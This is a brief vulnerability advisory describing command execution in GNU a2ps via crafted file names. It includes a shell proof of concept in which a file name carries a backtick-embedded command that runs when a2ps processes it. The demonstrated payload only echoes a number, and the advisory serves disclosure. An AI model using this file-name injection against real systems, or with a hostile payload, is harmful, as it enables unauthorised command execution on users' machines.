GNU a2ps File Name Command Execution Vulnerability
No exploit it required to leverage this issue. The following proof of concept has been provided:
The issue can be illustrated with the following set of shell commands:
$ touch 'x`echo >&2 42`.c'
$ a2ps -o /dev/null *.c
[x`echo >&2 42`.c (C): 0 pages on 0 sheets]
[Total: 0 pages on 0 sheets] saved into the file `/dev/null'